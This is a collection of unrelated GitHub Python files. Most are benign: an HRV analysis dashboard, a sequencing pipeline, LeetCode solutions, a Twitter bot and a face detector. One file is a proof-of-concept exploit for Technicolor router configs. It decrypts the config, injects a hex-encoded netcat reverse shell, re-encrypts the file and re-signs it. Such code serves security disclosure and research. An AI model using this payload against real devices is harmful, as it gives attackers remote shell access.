with open(prop_file, 'r') as f:\n config_string = '[config_section]\\n' + f.read()\n config = configparser.ConfigParser()\n config.read_string(config_string)\n return dict(config.items('config_section'))\n\nif __name__ == \"__main__\":\n config_file = None\n\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"c:h\", [\"config=\"])\n except getopt.GetoptError as err:\n print(err)\n usage()\n sys.exit(2)\n\n for o, a in opts:\n if o in (\"-c\", \"--config\"):\n config_file = a\n elif o in (\"-h\", \"--help\"):\n usage();\n sys.exit()\n else:\n assert False, \"Unknown option\"\n sys.exit(-1)\n\n props = read_properties_file(config_file)\n\n genome_type = props['genome_type']\n is_paired = props['is_paired']\n is_dropseq = props['is_dropseq']\n fastqs_input_dir = props['fastqs_input_dir']\n pipeline_dir = props['pipeline_dir']\n experiment = props['experiment']\n preprocess_dir = pipeline_dir +'/preprocess/' +experiment\n script_dir = pipeline_dir +'/scripts'\n config_dir = pipeline_dir +'/config'\n\n batch_size_str = props.get(\"batch_size\")\n\n if batch_size_str is None:\n batch_size = 100 #default number\n else:\n batch_size = int(props['batch_size'])\n\n\n print(preprocess_dir)\n #dir_path = os.path.dirname(os.path.realpath(__file__))\n\n individual_dirs = os.listdir(fastqs_input_dir)\n individual_dirs.sort()\n\n script_template = Template('$SCRIPT_DIR/preprocess/preprocess.sh -g $genome_type -p $is_paired -d is_dropseq -s $PIPELINE_DIR -i '\n '$FASTQS_INPUT_DIR/$individual -o $PREPROCESS_DIR/$individual '\n '-f $FASTQS_INPUT_DIR/$individual/$fastqs')\n multiqc_template = Template('multiqc $FASTQS_INPUT_DIR/$individual/fastQC_output $FASTQS_INPUT_DIR/$individual/star_output'\n ' $FASTQS_INPUT_DIR/$individual/htseqCount_output --filename $individual_multiqc_report.html')\n count=0\n jobname='runPreprocessJob.sh'\n job=open(jobname,'w')\n job.write('#!/bin/bash\\n\\n')\n\n multiqc_jobname=\"runMultiQCJob.sh\"\n multiqc_job=open(multiqc_jobname,'w')\n multiqc_job.write('#!/bin/bash\\n\\n')\n\n for individual in individual_dirs:\n if os.path.isdir(os.path.join(fastqs_input_dir,individual)):\n print(\"individual=\"+individual)\n multiqc_filename='runMultiqc_'+individual +'.sh'\n multiqc_file=open(multiqc_filename, \"w\")\n multiqc_file.write('#!/bin/bash\\n\\n')\n multiqc_file.write(multiqc_template.safe_substitute(FASTQS_INPUT_DIR=fastqs_input_dir, individual=individual))\n multiqc_file.close()\n multiqc_job.write('SBATCH ' + multiqc_filename + '\\n')\n\n fastqarr=[]\n #init fastq array\n for file in os.listdir(os.path.join(fastqs_input_dir,individual)):\n if file.endswith(\".fastq\"):\n fastqarr.append(file)\n fastqarr.sort()\n\n #split fastq array based on the batch size\n i=0\n print(\"fastqarr=\"+str(fastqarr))\n while i\n [data-testid=\"stForm\"] {border: 0px}\n \n'''\n\nst.markdown(css, unsafe_allow_html=True)\n\n\ndef load_data(file):\n if file.name.endswith('.csv'):\n if 'heartbeat' in file.name:\n df = pd.read_csv(file, index_col=0, parse_dates=True)\n if 'inter' in file.name:\n df = pd.read_csv(file)\n df['timestamp'] = pd.to_datetime(df['timestamp'])\n df['inter_beat_interval'] = df['inter_beat_interval'].astype(int)\n \n\n elif file.name.endswith('.parquet'):\n df = pd.read_parquet(file)\n # print(df)\n # if 'timestamp'\n else:\n raise ValueError(\"Unsupported file type: \" + file.name)\n\n # Ask for the HRV column name\n\n # if col_name not in df.columns:\n # default_col_name = 'inter_beat_interval'\n # col_name = st.text_input(\"HRV column name\", default_col_name)\n # st.error(f\"{col_name} is not a valid HRV column name, aborting.\")\n # st.stop()\n\n\n \n # if 'timestamp' not in df.columns:\n # st.error(f\"No timestamp found, aborting.\")\n # st.write(df.columns)\n # st.stop()\n # else:\n # print(df.index.dtype)\n if not str(df.index.dtype).startswith('datetime64'):\n print('Indexing timestamp')\n df = df.set_index('timestamp')\n\n st.write(df.head())\n # st.table(df.head())\n col_name = 'inter_beat_interval'\n return df, col_name\n\n# Processing inter_beat_intervals\ndef process_ibi(loc):\n candidates=['timestamp','value','bytes']\n\n # Value to Byte Array\n inter_beat_intervals = pd.read_csv(loc)\n inter_beat_intervals['bytes'] = inter_beat_intervals['value'].apply(lambda x: bytearray.fromhex(x))\n inter_beat_intervals = pd.DataFrame.from_dict(timestamp_conversion(inter_beat_intervals),orient='index')\n\n if 'datetime' in inter_beat_intervals:\n inter_beat_intervals.rename(columns={'datetime':'timestamp'},inplace=True)\n\n inter_beat_intervals = inter_beat_intervals.set_index('timestamp')\n inter_beat_intervals = inter_beat_intervals.drop([x for x in candidates if x in inter_beat_intervals.columns], axis=1)\n\n inter_beat_intervals = inter_beat_intervals.sort_index()\n return inter_beat_intervals\n\ndef timestamp_conversion(df):\n\n last_ibi = 0\n i = 0\n ibi_df = {}\n for index, row in df.iterrows():\n heartbeats = row['value']\n timestamp = row['timestamp']\n timestamp = str(int(timestamp) * 1000)\n frame_heartbeat_count = int(heartbeats[1:2])\n quality_indicator = int(heartbeats[5])\n if frame_heartbeat_count > 1:\n for heartbeat_index in range(1,frame_heartbeat_count+1): \n index_start = 3+(heartbeat_index-1)*8\n index_end = index_start + 4\n time_bytes = heartbeats[index_start*2:index_end*2]\n time_hex = bytearray.fromhex(time_bytes)\n ibi = int.from_bytes(time_hex, byteorder=\"little\")\n if last_ibi > 0:\n temp = ibi\n ibi = ibi - last_ibi\n last_ibi = temp\n else:\n last_ibi = ibi\n \n\n datetime = pd.to_datetime(timestamp, unit='ms')\n if heartbeat_index == 1:\n if i == 0:\n datetime = datetime + pd.Timedelta(milliseconds=0.01)\n ibi = 1000\n else:\n datetime = datetime + pd.Timedelta(milliseconds=0.01)\n\n else:\n datetime = datetime + pd.Timedelta(milliseconds=ibi)\n\n if ibi > 300 and ibi < 2000:\n ibi_df[i] = {'timestamp':datetime, 'inter_beat_interval': ibi, 'quality_indicator': quality_indicator}\n i += 1\n else:\n for heartbeat_index in range(1,2): \n index_start = 3+(heartbeat_index-1)*8\n index_end = index_start + 4\n time_bytes = heartbeats[index_start*2:index_end*2]\n time_hex = bytearray.fromhex(time_bytes)\n ibi = int.from_bytes(time_hex, byteorder=\"little\")\n\n if last_ibi > 0:\n temp = ibi\n ibi = ibi - last_ibi\n last_ibi = temp\n else:\n last_ibi = ibi\n datetime = pd.to_datetime(timestamp, unit='ms')\n if i == 0:\n datetime = datetime + pd.Timedelta(milliseconds=0.01)\n ibi = 1000\n else:\n datetime = datetime + pd.Timedelta(milliseconds=0.01)\n\n if ibi > 300 and ibi < 2000:\n ibi_df[i] = {'timestamp':datetime, 'inter_beat_interval': ibi, 'quality_indicator': quality_indicator}\n i += 1\n\n return ibi_df\n\n\ndef get_rhr(rr):\n hr = 60000/rr\n rhr = np.min(hr)\n return rhr\ndef timedomain(rr):\n results = {}\n\n hr = 60000/rr\n \n results['Mean RR (ms)'] = np.mean(rr)\n results['STD RR/SDNN (ms)'] = np.std(rr)\n results['Mean HR (Kubios\\' style) (beats/min)'] = 60000/np.mean(rr)\n results['Mean HR (beats/min)'] = np.mean(hr)\n results['STD HR (beats/min)'] = np.std(hr)\n results['Min HR (beats/min)'] = np.min(hr)\n results['Max HR (beats/min)'] = np.max(hr)\n results['RMSSD (ms)'] = np.sqrt(np.mean(np.square(np.diff(rr))))\n results['NNxx'] = np.sum(np.abs(np.diff(rr)) > 50)*1\n results['pNNxx (%)'] = 100 * np.sum((np.abs(np.diff(rr)) > 50)*1) / len(rr)\n return results\n\ndef remove_outliers(data, threshold='normal', size=30):\n outlier_counter = 0\n middle = size // 2\n if len(data) > size:\n for i, item in enumerate(data):\n if i < middle or i >= len(data) - middle:\n mean = np.mean(data)\n # continue # Skip first and last items\n window = data[i - middle:i + middle + 1]\n mean = np.mean(window)\n\n # Thresholding \n if threshold == 'normal':\n threshold_low = 0.5\n threshold_high = 1.5\n elif threshold == 'strict':\n threshold_low = 0.75\n threshold_high = 1.25\n elif threshold == 'loose':\n threshold_low = 0.2\n threshold_high = 1.8\n \n # Check for outliers\n if item < (threshold_low * mean) or item > (threshold_high * mean):\n data[i] = mean\n outlier_counter += 1\n\n else:\n print(f\"Window seems empty. Skipping...\")\n \n st.write(f\"{outlier_counter} outliers removed\")\n return data\n\ndef analyzer(df,start_time,end_time, openai_key, moments_df):\n st.title('Results') \n st.write('**Pre-Processing**')\n df_window = df.query(\"index >= @start_time and index < @end_time\")\n if moments_df is not None:\n moments_df = moments_df.query(\"index >= @start_time and index < @end_time\")\n diff = (end_time - start_time) / pd.Timedelta(minutes=1)\n print(diff)\n # This remove outliers from signal\n # rr_intervals_without_outliers = remove_outliers(rr_intervals=rr_intervals, \n # low_rri=300, high_rri=2000)\n # # This replace outliers nan values with linear interpolation\n # interpolated_rr_intervals = list(interpolate_nan_values(rr_intervals=rr_intervals_without_outliers,\n # interpolation_method=\"linear\"))\n df_window['inter_beat_interval'] = remove_outliers(df_window['inter_beat_interval'])\n df_index, df_rri = freq_psd.threshold_filter(df_window['inter_beat_interval'],threshold='strong',local_median_size=5)\n data = {'inter_beat_interval': df_rri}\n df_window = pd.DataFrame(data, index=df_index)\n # df_window['inter_beat_interval'] = freq_psd.moving_median(df_window)\n df_window['inter_beat_interval'] = df_window['inter_beat_interval'].interpolate(method='linear')\n rr_intervals = df_window['inter_beat_interval']\n\n st.write(df_window)\n\n # # Create the figure and axes objects\n # fig, ax = plt.subplots()\n\n # # Plot the rr_intervals series as a line with blue markers\n # ax.plot(rr_intervals.index, rr_intervals.values, '-o', color='blue', markersize=3)\n\n # # Set the x-axis label\n # ax.set_xlabel('Date and Time')\n\n # # Set the y-axis label\n # ax.set_ylabel('Inter-Beat Interval (ms)')\n\n # # Set the title of the plot\n # ax.set_title('Inter-Beat Intervals over Time')\n # fig = px.line(rr_intervals,markers=True)\n st.write('HRV data is unsteady - a single movement can already mess up your HRV data. Use this plot to see whether your data is messy, usually denoted by straight lines')\n st.line_chart(rr_intervals)\n # st.table(rr_intervals.head())\n # st.table(df_window.head())\n timedomain_values = timedomain(rr_intervals)\n\n\n\n\n\n # if ibi_df.index.duplicated().sum() == 0:\n\n # st.write(timedomain_values)\n time_df = pd.DataFrame.from_dict(timedomain_values,orient='index',columns=['value'])\n # st.write(time_df)\n st.write('**Time Domain**')\n st.table(time_df)\n\n st.write(\"*RMSSD Trend*\")\n rmssd = rr_intervals.rolling('5min',center=True).apply(freq_psd.do_rmssd)\n rmssd_trend = freq_psd.get_trend_line(rmssd)\n\n rmssd_fig, ax = plt.subplots(figsize=(20,10))\n ax.plot(rmssd.index, rmssd.values, '-',label='rmssd')\n ax.plot(rmssd.index, rmssd_trend.values, '-',label='trend')\n ax.set_ylabel('Value (ms)', color = 'black')\n ax.set_xlabel('Time', color = 'black')\n ax.legend(loc='best')\n\n if moments_df is not None:\n if not moments_df.empty:\n ymin, ymax = ax.get_ylim()\n for moment in moments_df.index:\n ax.axvline(x=moment, ymin=ymin, ymax=ymax, color='red', alpha=0.8)\n # ax.text(0.5, -0.1, 'MOMENT', transform=ax.transAxes, ha='center', va='center')\n ax.text(moment, ymin-0.1*(ymax-ymin), 'MOMENT', ha='center', va='center', color='red')\n\n handles, labels = ax.get_legend_handles_labels()\n handles.append(ax.axvline(x=moments_df.index[0], ymin=0, ymax=1, color='red'))\n labels.append('moment')\n ax.legend(handles, labels, loc='best')\n\n\n st.pyplot(rmssd_fig)\n rmssd_fig.clf()\n ax.cla()\n\n st.write(\"*RHR calculated using HRV*\")\n\n rhr = rr_intervals.rolling('1min',center=True).apply(get_rhr).rolling('5min').mean()\n rhr_trend = freq_psd.get_trend_line(rhr)\n rhr_fig, ax = plt.subplots(figsize=(20,10))\n ax.plot(rhr.index, rhr.values, '-',label='resting heart rate')\n ax.plot(rhr.index, rhr_trend.values, '-',label='trend')\n ax.set_ylabel('Value (bpm)', color = 'black')\n ax.set_xlabel('Time', color = 'black')\n ax.legend(loc='best')\n\n\n # if not moments_df.empty:\n # ymin, ymax = ax.get_ylim()\n # for moment in moments_df.index:\n # ax.axvline(x=moment, ymin=ymin, ymax=ymax, color='red', alpha=0.8)\n # # ax.text(0.5, -0.1, 'MOMENT', transform=ax.transAxes, ha='center', va='center')\n # ax.text(moment, ymin-0.1*(ymax-ymin), 'MOMENT', ha='center', va='center', color='red')\n # handles, labels = ax.get_legend_handles_labels()\n # handles.append(ax.axvline(x=moments_df.index[0], ymin=0, ymax=1, color='red'))\n # labels.append('moments')\n # ax.legend(handles, labels, loc='best')\n\n st.pyplot(rhr_fig)\n\n ##################################### \n\n frequency_values = get_frequency_domain_features(rr_intervals)\n for key in frequency_values:\n # rounding to K using round()\n # if key != 'lf_hf_ratio':\n frequency_values[key] = '{:.2f}'.format(frequency_values[key]).rstrip('0').rstrip('.')\n\n\n st.write('**Frequency Domain**')\n freq_df = pd.DataFrame.from_dict(frequency_values,orient='index',columns=['value'])\n\n # def get_lf_hf(window):\n # window = list(window)\n # frequency_domain_features = get_frequency_domain_features(nn_intervals = window)\n # return frequency_domain_features['lf_hf_ratio']\n \n \n # lf_hf = rr_intervals.rolling('5min',center=True).apply(get_lf_hf)\n # lfhf_trend = freq_psd.get_trend_line(lf_hf)\n # fig, ax = plt.subplots(figsize=(20,10))\n # ax.plot(lf_hf.index, lf_hf.values, '-',label='lf hf')\n # ax.plot(lf_hf.index, lfhf_trend.values, '-',label='trend')\n # ax.set_ylabel('Value (bpm)', color = 'black')\n # ax.set_xlabel('Time', color = 'black')\n # ax.legend(loc='best')\n # st.pyplot(fig)\n\n st.table(freq_df)\n freq_psd.plot_psd(rr_intervals, method=\"welch\")\n \n # if st.button('start configuration'):\n # st.session_state['step'] = 1\n # if st.session_state['step'] == 1:\n # with st.form('my form'):\n # st.session_state['number'] = st.number_input('choose a number', 1, 13)\n # if st.form_submit_button(\"save configuration\"): \n # st.session_state['step'] = 2\n # st.experimental_rerun() # form should not be shown after clicking 'save' \n \n\n # with st.form(key=\"chatgpt\"):\n # _, _, _, col, _, _, _ = st.columns([1]*6+[1])\n # run_chat = st.form_submit_button(\"Ask ChatGPT about my score\", disabled=(freq_df is None))\n # submitted = st.form_submit_button(\"Start analyzing\")\n # if run_chat:\n\n # st.write(timedomain_values['RMSSD (ms)'], frequency_values['lf'], frequency_values['hf'],frequency_values['lf_hf_ratio'])\n if openai_key:\n if not freq_df.empty and not time_df.empty:\n\n def show_messages(text):\n messages_str = [\n f\"{_['role']}: {_['content']}\" for _ in st.session_state[\"messages\"][1:]\n ]\n text.text_area(\"Messages\", value=str(\"\\n\".join(messages_str)), height=400)\n\n\n openai.api_key = openai_key\n BASE_PROMPT = [{\"role\": \"system\", \"content\": \"You are a helpful assistant.\"}]\n\n if \"messages\" not in st.session_state:\n st.session_state[\"messages\"] = BASE_PROMPT\n\n st.header(\"ChatGPT HRV Analysis\")\n # st.markdown(\"\"\"---\"\"\")\n\n # text = st.empty()\n # show_messages(text)\n # ']])\n print(timedomain_values['RMSSD (ms)'])\n rmssd_ms = int(float(timedomain_values['RMSSD (ms)']))\n lf = int(float(frequency_values['lf']))\n hf = int(float(frequency_values['hf']))\n lf_hf = frequency_values['lf_hf_ratio']\n prompt = f\"Tell me about my HRV: RMSSD (ms): {rmssd_ms} and my LF, HF, and LF HF Ratio in Hz: , {lf, hf,lf_hf}. The total time of measurement was {diff} minutes. Don't use more than 200 words. Keep it simple and motivating, very positive. Explain how it relates to mental balance. Always display the values.\"\n # st.write(len(prompt))\n # if st.form_submit_button(\"Send\"):\n with st.spinner(\"Generating response...\"):\n st.session_state[\"messages\"] += [{\"role\": \"user\", \"content\": prompt}]\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\", messages=st.session_state[\"messages\"],\n temperature=0.3,\n max_tokens=500,\n\n\n )\n message_response = response[\"choices\"][0][\"message\"][\"content\"]\n # st.session_state[\"messages\"] += [\n # {\"role\": \"system\", \"content\": message_response}\n # ]\n # show_messages(text)\n st.write(message_response)\n\n if st.form_submit_button(\"Clear\"):\n prompt = \"\"\n # st.session_state[\"messages\"] = BASE_PROMPT\n # show_messages(text)\n # Display the bar chart using st.bar_chart\n # st.bar_chart(lf_hf_df)\n # st.bar_chart(freq_df.iloc['lf','hf']])\n # st.write('Plotting!')\n # st.write(time)\n\n\ndef get_time_range(df, timezone):\n # Convert the datetime index to the selected timezone\n \n df.index = df.index + timedelta(hours=timezone)\n \n # Get the start and end datetime values as strings\n start_time = df.index.min().strftime('%Y-%m-%d %H:%M:%S %Z%z')\n end_time = df.index.max().strftime('%Y-%m-%d %H:%M:%S %Z%z')\n \n return start_time, end_time\n\ndef main():\n df = None\n end_datetime = None\n # st.title(\"HRV Analyzer\")\n st.markdown(\"

    HRV Analyzer

    \", unsafe_allow_html=True)\n st.markdown(\"

    NOWATCH

    \", unsafe_allow_html=True)\n st.markdown(\"

    Lennart Zegerius\", unsafe_allow_html=True)\n st.write('\\n')\n st.markdown(\"\"\"---\"\"\")\n format = st.radio(\n \"Uploading CSV or Parquet? (Large files? Use parquet)\",\n ('CSV', 'Parquet'))\n\n st.write('UPDATE 2023-04-18: \\nFile loading may take a little longer due to some extra checks on the data. Be patient :-)')\n if format == 'Parquet':\n file = st.file_uploader(\"Upload a parquet file containing interbeat intervals. \",type='parquet')\n if file is not None:\n df, hrv_col = load_data(file)\n # st.table(df.head())\n else:\n file = st.file_uploader(\"Upload a csv file containing interbeat intervals. \",type='csv')\n \n if file is not None and file.name.startswith('heart'):\n df = process_ibi(file)\n elif file is not None and file.name.startswith('inter'):\n df, hrv_col = load_data(file)\n\n\n # st.table(df.head())\n # st.write(\"You didn\\'t select comedy.\")\n # file = st.file_uploader(\"Upload a parquet file containing interbeat intervals. \")\n # csv_file = st.file_uploader(\"Upload hearbeats.csv\")\n if df is not None:\n \n \n # st.write(df.index.dtype)\n # dates = pd.to_datetime(df.index)\n # st.write(dates.dtype)\n\n timezone = 0\n df.index = df.index + timedelta(hours=timezone)\n timezone = st.slider('Timezone (UTC)', min_value=-12, max_value=12, step=1, value=0)\n df.index = df.index + timedelta(hours=timezone)\n st.write(\"Date: \",df.index.min(), \" - \", df.index.max())\n # st.write(\"End datetime: \",df.index.max())\n\n\n Date = df.index.unique().tolist()\n\n min_value = datetime.strptime(min(Date).strftime('%Y-%m-%d %H:%M:%S'), '%Y-%m-%d %H:%M:%S') # str to datetime\n max_value = datetime.strptime(max(Date).strftime('%Y-%m-%d %H:%M:%S'), '%Y-%m-%d %H:%M:%S')\n value = (min_value, max_value)\n # st.write(df.index.max())\n# st.write(min_value.dtype)\n \n # Model = st.slider(\n # 'Pick a RR-interval window:',\n # min_value=min_value,\n # max_value=max_value,\n # format = \"HH:mm\",\n # step = timedelta(minutes=2),\n # value=value,\n # )\n\n\n # selmin, selmax = Model\n selmind = min_value.strftime('%H:%M') # datetime to str\n selmaxd = max_value.strftime('%H:%M')\n \n # st.write('Or pick a time here')\n\n unique_dates = np.unique(df.index.date)\n start_date = st.selectbox(options=unique_dates,label='Start Date:')\n start_time = st.text_input(label='Start Time:',placeholder=selmind)\n start_datetime_str = f\"{start_date} {start_time}\"\n if len(start_time) == 5:\n start_datetime = datetime.strptime(start_datetime_str, '%Y-%m-%d %H:%M')\n # st.write(start_date, start_time)\n\n if start_time:\n end_date = st.selectbox(options=unique_dates,label='End Date:',index=len(unique_dates)-1)\n end_time = st.text_input(label='End Time:',placeholder=selmaxd)\n # Concatenate the end date and end time strings\n end_datetime_str = f\"{end_date} {end_time}\"\n if len(end_time) == 5:\n end_datetime = datetime.strptime(end_datetime_str, '%Y-%m-%d %H:%M')\n\n # st.write(end_date, end_time)\n\n if end_time:\n openai_key = st.text_input(label='OpenAI API Key (optional): ',placeholder=\"...\")\n moments = st.file_uploader(\"Upload Moments (optional): \",type='csv')\n if moments is not None:\n filename = str(moments.name)\n\n if 'system' in filename:\n moments_df = pd.read_csv(moments).drop('value',axis=1)\n moments_df['timestamp'] = pd.to_datetime(moments_df['timestamp'],unit='s')\n moments_df = moments_df[moments_df['type'] == 'MOMENT']\n moments_df = moments_df.set_index('timestamp')\n moments_df.index = moments_df.index + timedelta(hours=timezone)\n if not moments_df.empty:\n MOMENTS = True\n st.write(moments_df)\n elif 'moment' in filename: \n if moments is not None:\n moments_df = pd.read_csv(moments).drop('value',axis=1).set_index('timestamp')\n moments_df = moments_df[moments_df['type'] == 'MOMENT']\n moments_df.index = pd.to_datetime(moments_df.index) + timedelta(hours=timezone)\n if not moments_df.empty:\n MOMENTS = True\n st.write(moments_df)\n else:\n st.write(\"No moments found\")\n moments_df = None\n else:\n moments_df = None\n st.markdown(\"\"\"---\"\"\")\n \n st.write('\\n')\n\n st.write('\\n')\n if start_time and end_time:\n st.write(\"Selected window:\", start_datetime, \" - \", end_datetime)\n # st.write(selmax)\n \n with st.form(key=\"my_form\"):\n _, _, _, col, _, _, _ = st.columns([1]*6+[1])\n submitted = col.form_submit_button(\"Start analyzing\", disabled=(end_datetime is None))\n # submitted = st.form_submit_button(\"Start analyzing\")\n if submitted and start_datetime and end_datetime:\n analyzer(df, start_datetime, end_datetime, openai_key, moments_df)\n\n # st.write(\"Running analyzer...\")\n \n\nif __name__ == '__main__':\n # Set page title\n # st.set_page_config(page_title=\"HRV Dashboard\")\n # st.set_page_config(layout=\"wide\") \n # Set app URL\n # app_url = 'https://hrv.lenn.dev'\n # st.write(f'', unsafe_allow_html=True)\n main()\n","repo_name":"Lenzeg/hrv-analyzer-nowatch","sub_path":"hrv_analyzer.py","file_name":"hrv_analyzer.py","file_ext":"py","file_size_in_byte":23354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13032305151","text":"#!/usr/bin/env python3\n# poc config injection exploit\n\nfrom Crypto.Cipher import AES\nimport hmac\nimport hashlib\n\ntry:\n\tinputkey = open (\"proc_rip_0108\", \"rb\")\nexcept:\n\tprint (\"Cannot open encryption key file ./proc_rip_0108\")\n\texit()\n\ntry:\n\tinputfile = open (\"config.bin\", \"rb\")\nexcept:\n\tprint (\"Cannot open file ./config.bin\")\n\texit()\n\n# reverse shell on 192.168.1.69:1337\npayload = \"6e63203139322e3136382e312e36392031333337202d65202f62696e2f7368207c7c2074727565\"\n\nhmac_key = inputkey.read()\naes_key = hmac_key[:32]\n\nconfig = inputfile.read()\n\nsz = len(config)\nheader_end = config.find(b\"\\n\\n\") + 2\nheader_data = config[:header_end]\niv_end = header_end + 16\naes_end = sz - 20\niv = config[header_end:iv_end]\naes_data = config[iv_end:aes_end]\nhmac_data = config[aes_end:]\n\nprint (\"File size: \" + str(sz))\nprint (\"IV \" + str(len(iv)) + \" \" + iv.hex())\nprint (\"HMAC \" + str(len(hmac_data)) + \" \" + hmac_data.hex())\nprint (\"AES data \" + str(len(aes_data)))\n\n# decrypt\ncipher_dec = AES.new (aes_key, AES.MODE_CBC, iv)\ndecrypted_raw = cipher_dec.decrypt (aes_data)\n\n# remove padding\ndecrypted = decrypted_raw[:-decrypted_raw[-1]]\ndecrypted_file = open(\"config.txt\", \"w\")\ndecrypted_file.write(decrypted.decode(\"utf-8\"))\ndecrypted_file.close()\n\n# patch\npatched = decrypted.replace (b\"wps_button_pressed.sh\", bytes.fromhex(payload))\npatch_file = open(\"config_patched.txt\", \"w\")\npatch_file.write(patched.decode(\"utf-8\"))\npatch_file.close()\n\n# add padding\npatched_len = len(patched) % 16\nif patched_len:\n\tadd_pad = 16 - patched_len\n\tpad = add_pad * chr(add_pad)\n\tpatched += bytes(pad, \"utf-8\")\n\n# encrypt\ncipher_enc = AES.new (aes_key, AES.MODE_CBC, iv)\nencrypted = cipher_enc.encrypt (patched)\n\n# calc new hmac\nhmac_new = hmac.new(hmac_key, header_data + iv + encrypted, digestmod=hashlib.sha1).digest()\n\nout = open (\"config_patched.bin\", \"wb\")\nout.write(header_data)\nout.write(iv)\nout.write(encrypted)\nout.write(hmac_new)\nout.close()\n\nprint (\"Written config_patched.bin\")\n\n","repo_name":"antnks/technicolor-config-decrypt","sub_path":"exploit_config.py","file_name":"exploit_config.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"35789129660","text":"#\n# @lc app=leetcode id=55 lang=python3\n#\n# [55] Jump Game\n#\n\n# @lc code=start\nclass Solution:\n def canJump(self, nums: List[int]) -> bool:\n # if len(nums) == 1:\n # return True\n furthest = 0\n\n for i in range(len(nums)):\n if furthest < i:\n return False\n furthest = max(furthest, i+nums[i])\n if furthest >= len(nums) - 1:\n return True\n return False\n \n# @lc code=end\n\n","repo_name":"dragonwood1024/practise","sub_path":"55.jump-game.py","file_name":"55.jump-game.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18721278555","text":"class Solution(object):\n def topKFrequent(self, nums, k):\n result = []\n dict = collections.Counter(nums)\n dict = sorted(dict.items(), key=lambda x: x[1], reverse=True)\n for key, value in dict[:k]:\n result.append(key)\n return result\n \n \n","repo_name":"Isa1asN/competitive-programming","sub_path":"top_k_frequent_elements.py","file_name":"top_k_frequent_elements.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29730633481","text":"# import sys\nimport twitter\nimport configparser as ConfigParser\nimport pandas as pd\n\ndef auto_tweets(api, msg):\n\tmessage = msg\n\tstatus = api.PostUpdate(message)\n\t\ndef auto_getUserTimeLine(api, screen_name, max_count):\n\tuser = screen_name\n\tstatuses = api.GetUserTimeline(screen_name=screen_name, count = max_count)\n\treturn statuses\n\ndef auto_favorite_auto_tweet(api, posted_tweets):\n for status in posted_tweets:\n if status.favorited == False:\n api.CreateFavorite(status_id=status.id)\n if status.retweeted == False:\n api.PostRetweet(status_id=status.id)\n\n# In case detected automated activity, do not use it.\ndef auto_reply(api, statuses, screen_name, msg):\n\tfor sts in statuses:\n\t\tapi.PostUpdate(status=\"@\"+ screen_name + \" \"+ msg, in_reply_to_status_id=sts.id)\n\ndef main():\n\tcp = ConfigParser.SafeConfigParser()\n\tcp.read('test.conf')\n\t# Later add checks here, in case test.conf do not have auth section.\n\tconsumer_key = cp.get('auth', 'consumer_key')\n\tconsumer_secret = cp.get('auth', 'consumer_secret')\n\taccess_token = cp.get('auth', 'access_token')\n\taccess_token_secret = cp.get('auth', 'access_token_secret')\n\n\tapi = twitter.Api(consumer_key=consumer_key, consumer_secret=consumer_secret, access_token_key=access_token, access_token_secret=access_token_secret)\n\tscreen_name = cp.get('user', 'screen_name')\n\tstatuses = auto_getUserTimeLine(api, screen_name, 10)\n\tprint(len(statuses))\n\t\n\t# new_since_id = \"970073708357337089\"\n\t# cp.set('user', 'since_id', new_since_id)\n\t# cp.write(open('test.conf', 'w')) \n\t# auto_reply(api, statuses, screen_name, msg)\n\t# auto_favorite_auto_tweet(api, statuses)\n\tfor status in statuses:\n\t\tprint(status)\n\n\t# writeFileName = 'status1.csv'\n\t# since_id_content = []\n\t# text_content = []\n\t# if statuses:\n\t# \twith open('userPipeline.json', 'a') as f:\n\t# \t\tfor status in statuses:\n\t\t\t\t\n\t# \t\t\tf.write(str(status))\n\n\t# \t\t\tsince_id_content.append(status.id)\n\t# \t\t\ttext = status.text.replace(',', ' ')\n\t# \t\t\ttext = status.text.replace('\\n', ' ')\n\t# \t\t\ttext_content.append(text)\n\t# \t\t# text_content.append(status.text)\n\t# dataframe = pd.DataFrame({'since_id':since_id_content,'text':text_content})\n\t# dataframe.to_csv(writeFileName, index=False, sep=',')\n\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","repo_name":"ShengZhang2016/Tweet_Rob","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27630884119","text":"import json\nfrom json.decoder import JSONDecodeError\nimport os\nimport glob\nimport cv2\nimport dlib\nfrom skimage import io\nimport pandas as pd\nimport numpy as np\nfrom urllib.parse import urlparse\n\n# Image processing (photo & thumbnail)\n\n\ndir = os.getcwd()\nin_files = glob.glob(dir+'/PrepData0313/'+'*.json')\n# in_files = dir+'/dataset0313.csv'\nimage_out_dir = dir+'/PrepImage/'\ntn_out_dir = dir+'/PrepTN/'\nlist_of_dct = []\nlist_of_dct2 = []\nunavailable_json = []\n\n# https://towardsdatascience.com/simple-face-detection-in-python-1fcda0ea648e\n# https://www.bogotobogo.com/python/OpenCV_Python/python_opencv3_Image_Object_Detection_Face_Detection_Haar_Cascade_Classifiers.php\n\n\n# Input data\n# input = pd.read_csv(in_files)\n# print(sum(pd.notnull(input['thumbnail_url']))) # 562 with photo type; # 1512 thumbnail\n\n# Load the cascade\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\n\n\ndef detect_print(image_url, filename, out_dir):\n print(image_url)\n if image_url == 'https://external-lax3-1.xx.fbcdn.net/safe_image.php?d=AQFwNwXgZM3XiZ1R&w=698&h=698&url=https%3A%2F%2Fwww.swcbulletin.com%2Fsites%2Fdefault%2Ffiles%2Fstyles%2F16x9_1240%2Fpublic%2F1_2DMvVxOlxEkjoJViBAdWP1k5_d1ufEo.jpg%3Fitok%3D0U78mR2S&cfs=1&sx=0&sy=0&sw=698&sh=698&_nc_cb=1&_nc_hash=AQGH0XiLaHJ14MGQ':\n return\n\n try:\n # Read image from URL\n img = io.imread(image_url)\n # Turn into gray\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # Detect faces\n faces = face_cascade.detectMultiScale(gray, 1.1, 5)\n # Draw rectangle around the faces\n for (x, y, w, 